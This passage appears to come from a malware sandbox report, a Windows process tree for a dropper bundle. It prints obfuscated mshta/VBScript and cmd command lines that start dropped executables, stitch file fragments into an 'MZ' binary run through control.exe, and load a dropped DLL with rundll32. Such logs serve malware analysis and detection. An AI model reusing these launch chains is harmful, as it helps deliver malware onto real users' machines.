C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:824
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:4320
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:4560
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:1060
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:5896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:5856
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:6616
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"8⤵
- Kills process with taskkill
PID:1940
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵PID:1060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-J5999.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-J5999.tmp\Thu16f3de88a335950bb.tmp" /SL5="$401F6,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu16f3de88a335950bb.exe"1⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu16f3de88a335950bb.exe" /SILENT2⤵
- Executes dropped EXE
PID:2120 -
C:\Users\Admin\AppData\Local\Temp\is-PC6RC.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-PC6RC.tmp\Thu16f3de88a335950bb.tmp" /SL5="$80056,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu16f3de88a335950bb.exe" /SILENT3⤵PID:1528
-
C:\Users\Admin\AppData\Local\Temp\is-UV1D0.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-UV1D0.tmp\postback.exe" ss14⤵PID:5068
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss14⤵PID:5108
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart4⤵PID:2204
-
C:\3caecc1e2a0bc5b5b3b5cbe0a6\Setup.exeC:\3caecc1e2a0bc5b5b3b5cbe0a6\\Setup.exe /q /norestart /x86 /x64 /web5⤵PID:2492
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC89BE936\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe1⤵
- Executes dropped EXE
PID:2228
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4612 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3044
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2052
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵PID:916
-
C:\Windows\System32\IME\SHARED\imebroker.exeC:\Windows\System32\IME\SHARED\imebroker.exe -Embedding1⤵PID:3044